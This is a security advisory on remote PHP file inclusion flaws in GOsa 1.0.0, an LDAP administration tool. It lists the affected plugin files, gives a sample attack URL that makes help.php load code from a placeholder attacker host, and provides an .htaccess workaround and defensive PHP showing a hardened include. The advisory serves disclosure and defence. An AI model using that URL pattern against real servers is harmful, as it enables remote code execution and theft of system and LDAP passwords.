I. BACKGROUND

The GOnicus System Administrator (GOsa) is a PHP based administration tool for managing accounts/systems in LDAP databases.

Project homepage: http://www.gonicus.de

II. DESCRIPTION

A remote attacker can inject arbitrary PHP code into GOsa that executes under the privileges of the underlying web server. There are several places where, by modifying certain request variables, an attacker can execute arbitrary PHP code.

By setting the plugin variable in the following files, an attacker can include remote files and execute them as PHP code:

plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php

The same situation exists in include/help.php, where the base variable can be set to a remote host so that a remote file is included. The following is a sample attack URL that would cause "target.server" to load include/common.inc from "attackers.server":

http://target.server/include/help.php?base=http://attackers.server/

GOsa doesn't support "register_globals off".

III. ANALYSIS

Remote exploitation allows an attacker to execute arbitrary commands and code under the privileges of the web server. This also opens the door to privilege escalation attacks. An attacker could also debug httpd child processes and grab secret information such as users' system passwords and LDAP passwords.

IV. DETECTION

GOsa version 1.0.0 (current) is confirmed vulnerable.

V. WORKAROUND

A temporary solution is to enable Apache .htaccess authentication in all subdirectories containing .php files that are only included, never accessed directly.

Example .htaccess file:

AuthType Basic
AuthName koza
AuthUserFile /dev/null
require valid-user

Karol Wiesek [appelast-at-bsquad.sm.pl]
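The root cause described above is an include() whose path is assembled from a request variable that register_globals hands the script unchecked. The following is an added example, not GOsa's own source: the vulnerable function is an illustrative reconstruction of the pattern the advisory describes, and the plugin names in the allow-list, the plugins/<name>/main.inc layout and the function names are assumptions made for the example.

```php
<?php
// Added example (not GOsa code). Shows the reported include pattern next to
// a hardened replacement. vulnerable_path() is an ILLUSTRATIVE reconstruction
// of the bug, not the project's actual source.

// Vulnerable pattern: with register_globals on, $base arrives straight from
// ?base=... so the request decides where include() reads from, including
// http:// URLs whenever allow_url_fopen is enabled (the PHP default).
function vulnerable_path($base)
{
    return $base . 'include/common.inc';
}

// Hardened version: the directory is fixed relative to this script, the
// request may only pick a plugin name from an allow-list, and the resolved
// path is checked to still lie inside the application tree.
function safe_plugin_path($plugin)
{
    $root = realpath(dirname(__FILE__));
    $allowed = array('blocklists', 'terminals', 'mailinglists'); // hypothetical names
    if (!in_array($plugin, $allowed, true)) {
        return false;                      // anything not on the list is refused
    }
    $path = realpath($root . '/plugins/' . $plugin . '/main.inc'); // assumed layout
    // realpath() returns false for a missing file and resolves "..", so a path
    // that still starts with $root is guaranteed to be inside the tree.
    if ($path === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

// Constructed inputs to exercise both functions:
var_dump(vulnerable_path('/var/www/gosa/'));        // local path, as the author intended
var_dump(safe_plugin_path('../../etc'));            // bool(false): not on the allow-list
var_dump(safe_plugin_path('http://example.org/'));  // bool(false): not on the allow-list
$p = safe_plugin_path('blocklists');
if ($p !== false) {
    include($p);                                    // only reached for a vetted local file
}
```

Two configuration-level mitigations complement the .htaccess workaround: setting allow_url_fopen = Off in php.ini stops include() from fetching http:// and ftp:// targets at all, and since the application does not run with register_globals off, the code should read its inputs explicitly from $_GET / $_POST rather than trusting bare globals.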